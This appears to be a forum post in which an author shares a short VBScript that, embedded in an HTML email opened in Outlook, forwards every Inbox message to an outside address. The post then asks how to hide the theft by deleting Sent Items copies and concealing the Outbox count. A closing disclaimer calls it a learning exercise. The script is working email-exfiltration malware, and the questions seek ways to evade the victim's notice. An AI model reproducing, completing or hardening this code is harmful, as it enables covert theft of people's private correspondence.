Well, as i'd never seen a VBS virus that 'stole' your email I set about making one.
(I've never used VBS/WSH before so this was a first, although it is mighty similar to the old QBASIC stuff to which i'm quite accustomed to... ahhh, those were the days!)
So, here she is:
Set appOutlook = CreateObject("Outlook.Application") 'connects to outlook Set mapiNameSpace = appOutlook.GetNameSpace("MAPI") 'authenticates Set objInBox = mapiNameSpace.GetDefaultFolder(6) 'gets Inbox For Each objItem in objInBox.Items 'iterates though each message Set objMail = appOutlook.CreateItem(0) objMail.To = "*AN ADDRESSfirstname.lastname@example.org" 'sets To: objMail.Subject = objItem.Subject 'copies Subject objMail.Body = objItem.Body 'copies Body objMail.Send 'sends message Next Set objMail = Nothing
Now, this thing works a treat when embedded in an HTML email message sent to MS Outlook (Note: NOT Outlook Express, sorry!). As I explained above, it makes a copy of each message and sends it to *AN ADDRESSemail@example.com however, there is at least one major problem. All the code does is line the messages up, ready to be sent, in the Outbox folder. So, if the emails are to be stolen the 'victim' (me!) has to press 'Send And Receive'... at which point he (me!) will see the 45000 messages being sent. To make matters worse, if the victim (...yep, me!) then later checks his 'Sent Items', lo and behold, a log of all the 'stolen' messages glows before his eyes!
Right, so to go about fixing it... Now I could probably interface with 'Sent Items' and make the script autmatically delete them after they've been sent - or perhaps there is a variable that would tell Outlook not to make a 'Sent Items' copy for these few messages?
But the real problem is that when the script is run (secretly) the victim can see 'Outbox (543)' and tell straight away that something is sending emails for him. And of course it wouldn't be difficult at all to find out where they were going...
Please note, that i'm only writing this code to learn some VBS and some of how the language controls Windows' objects. It is not meant to be used for ANY malicious purposes, and I accept no responsibility if it is so abused.